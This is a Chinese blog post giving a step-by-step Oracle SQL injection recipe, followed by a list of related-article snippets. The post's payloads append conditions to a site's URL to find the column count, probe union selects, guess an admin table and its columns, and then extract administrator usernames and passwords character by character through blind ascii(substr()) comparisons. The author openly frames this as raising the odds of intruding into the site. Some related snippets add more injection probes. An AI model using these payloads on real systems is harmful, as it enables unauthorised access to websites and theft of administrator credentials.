Oracle注入

最新推荐文章于 2024-05-20 21:14:17 发布
最新推荐文章于 2024-05-20 21:14:17 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 学海无涯
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38656841/article/details/87953378
版权

Oracle注入

1.首先order by 数量确定列的数量

2.然后union select null,’null’,null from admin   必须用null如果返回错入则代表引号内的列不是字符列,直到返回正确的为止

3.判断一下数据库中的表网址后面加上and (select count(*) from admin) <>0 返回正常,说明存在admin表。如果返回错误可将admin改为username,manager等常用表名继续猜解。

4.判断列名and (select count(*) from admin) <>0 将这条语句中的*号替换为常用的列名,如:and (select count(user) from admin) <>0如果存在则代表admin这个表中有user这个列

5.判断该网站下有几个管理员,如果有多个的话入侵的几率就会加大。

例如:and (select count(*) from admin)=1

返回正常说明只有一个管理员。

6.判断账号的长度 and (select count(*) from admin where length(name)>=5)=1

说明:length()函数用于求字符串的长度此处猜解的用户名长度和5比较,即可猜测是否由5个字符组成。

7.判断第一个字母 and (select count(*) from admin where ascii(substr(name,1,1))>=9)=1

说明:substr()函数用于截取字符串,ascii()函数用于获取字符的ascii码,此处的意思是截取name字段的第一个字符,获取他的ascii码值。

8. 重复此操作即可推出全部的用户名

如:and (select count(*) from admin where ascii(substr(name,2,1))>=9)=1     猜解第二个字符。。。依次类推

继续猜解密码:and (select count(*) from admin where ascii(substr(pwd,1,1))>=9)=1   猜解pwd表的第一个字符

 

时光凉春衫薄
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Order by注入
qq_40710190的博客
07-01 4229
MySQL order by注入
SQL注入--Oracle
pygain的博客
10-09 1508
1.判断是否为oracle数据库 id=88 and exists(select *from dual) id=88 and exists(select *from user_tables)这两个表都是系统表,返回正常则为oralce数据库 2.查询字段数 order by 4 异常 order by 3 正常   最大列数为3 3.判断字段类型 id=88 unio
SQL注入之ORDER BY注入
m0_74834253的博客
02-22 2318
使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。需要注意的是这样注入的效率很低,还是应该先考虑其他的注入方式最后在采用时间盲注。order by还支持多个字段自定义排序,通过逗号隔开,但只能在数字之间进行自定义排序,若选择字符类型则会根据第一个列名的排序规则进行排序。为true或者false时,排序结果是不同的,但因为序列相同所以就可以使用rand()函数进行盲注了。
oracle:sql注入
最新发布
kzr380203739的专栏
05-20 77
3、cookie注入注入字段在cookie数据中,网站使用通用的防注入程序,会对get、post提交的数据进行过滤,缺往往遗漏对cookie中的数据进行过滤。4、其他注入:http请求的其他内容出发的SQL注入漏洞,如user-agent、referer、x-forwarded-for(xff,)等。xff代表客户端“真实的IP地址”,xff注入注入点位置在头部的xff头的位置。5、二次注入注入位置在引用我们提前插入的恶意字段。2、post注入注入字段在PAST提交的数据中。
Oracle第一种注入方式
qq_44735563的博客
05-22 242
Oracle第一种注入方式 1.判断oracle数据库: and exists(select * from dual) and exists(select * from user_tables) 2.判断列数: order by 3.获取数据类型不匹配的列: id=100 union select null,null,null,null, null, null, from dual 在每列上逐...
19、注入篇--报错注入Oracle
WX公众号-小白学安全
04-10 746
Oracle概述 1、Oracle数据库属于甲骨文公司,关系型数据库管理系统,数据库 2、讲究语法严谨 select 字段名 from 表名 3、dual表—>虚表 专门用于满足数据库语句结构的表 大部分数据库是数据敏感大小写,语句是不敏感大小写 4、Oracle系统自带表: 没有库的概念,只有用户的概念 查询出所有的表: select from all_tables 查询用户所创建的表:select from user_tables 查询所有的字段:select from all_tab_colum
oracle函数 length()函数的使用
热门推荐
weixin_42484999的博客
12-24 2万+
length(函数) 1、按照字符串进行分组统计; select length(id_card),count(1) from 表名称 group by length(id_card) 结果: 2、对id_card字段长度既不等于18又不等于15的数据进行统计 select count(1) from 表名 where length(id_card)<>18 and length(id_card)<>15 你会发现,只将length=17统计了出来,长度不存在的数据根本就没有统计出
Oracle注入(基础篇)
hackzkaq的博客
03-01 4365
零基础学黑客,搜索公众号:白帽子左一 先了解Oracle一些内容 Oracle做联合注入的注意事项(附带示例) 联合查询的字段数必须和前面的查询语句字段数一致 select id,username,password from admin union select 1,'admin' from dual (X) 联合查询的字段类型也必须和前面的查询语句字段类型一致 select id,username,password from admin union select 1,2,3 from dual (X)
oracle注入绕狗1
08-03
Oracle注入绕狗技术详解】 Oracle数据库中的注入攻击是指攻击者通过输入恶意SQL代码,篡改原有的数据库查询,以获取敏感信息或执行非法操作。在本文中,我们将深入探讨Oracle注入的一些基本概念、常用技巧以及...
Oracle注入简单挖掘.docx
09-24
Oracle注入是网络安全中的一个重要话题,尤其是在进行Web渗透测试时。这种攻击方式源于应用程序未能正确过滤或转义用户输入,使得恶意SQL代码能够与数据库交互,获取、修改或删除敏感数据。Oracle数据库因其复杂性和...
oracle注入utl_http方法.doc
07-18
Oracle 注入 utl_http 方法 Oracle 注入 utl_http 方法是指攻击者使用 Oracle 数据库的 UTL_HTTP 包来实现注入攻击的方法。UTL_HTTP 是 Oracle 提供的一个包,用于通过 HTTP 协议从远程服务器获取数据。攻击者可以...
Oracle也有注入漏洞
09-11
### Oracle也有注入漏洞 #### 知识点概览 1. **Oracle数据库注入漏洞的概念** 2. **如何发现Oracle数据库的注入漏洞** 3. **利用Oracle数据库注入漏洞的方法** 4. **修补Oracle数据库注入漏洞的策略** #### ...
一篇文章带你入门Oracle注入1
08-03
1. varchar, varchar2 表示个字符串 3. DATA 表示期类型 4. CLOB 对象,表示本数据类型,可存4G 5. BLOB 对象,表示进
犀利的 oracle 注入技术
06-09
### 犀利的Oracle注入技术详解 #### 一、Oracle注入技术概述 在网络安全领域,SQL注入是一种常见的攻击方式,攻击者通过篡改输入数据,利用编程不足或设计缺陷来执行恶意SQL命令,以此获取敏感信息或者控制目标...
Oracle注入渗透北京某大学校园信息平台.doc
04-08
Oracle注入渗透北京某大学校园信息平台
Oracle数据库SQL注入手册1
08-08
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’
2022年SQL经典面试题总结(带解析)
hahazz233的博客
06-27 1万+
一、选择题(1)基础题1、要求删除商品表中价格大于3000的商品,下列SQL语句正确的是()A、DELETE FROM 商品 WHERE 价格>3000B、DELETE * FROM 商品 WHERE 价格>3000C、DELETE FROM 商品D、UPDATE 商品 SET * =NULL WHERE 价格>3000正确答案: A答案解析:这道题考察的是delete语法DELETE FROM table_nameWHERE some_column=some_value;2、在book表中,将工具书类型(
order by注入与limit注入
lml_0916的博客
08-08 1739
在数据库中,order by的作用是对数据表中查询的数据进行排序的方式。正常情况下我们去查询一个数据库的时候,它显示的顺序可能是根据插入的数据来进行排序的,所以可以通过order by进行排序,方便查看select * from 表名 order by 列名(数字) asc;(升序的) select * from 表名 order by 列名(数字) desc;(降序的)举个例子:正常情况下,用户表的排名是这样的当我们使用命令。...
oracle注入报错500
05-26
Oracle注入报错500一般表示服务器端出现了内部错误,可能与注入攻击有关,但也可能是其他原因导致的。要解决此问题,可以尝试以下步骤: 1. 检查注入语句是否正确,是否存在语法错误或拼写错误等问题。 2. 检查注入语句是否与目标数据库兼容,是否支持所使用的SQL语句。 3. 检查目标数据库是否存在安全漏洞,是否开启了必要的安全措施。 4. 检查服务器端日志和错误信息,查看具体的错误信息,以便进一步分析和解决问题。 5. 尽可能避免使用一些过时的、不安全的注入方法,如使用 "or 1=1" 等简单的注入语句进行测试。 除此之外,也可以考虑使用一些防注入工具或框架,如OWASP ESAPI等,来增加应用程序的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

时光凉春衫薄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值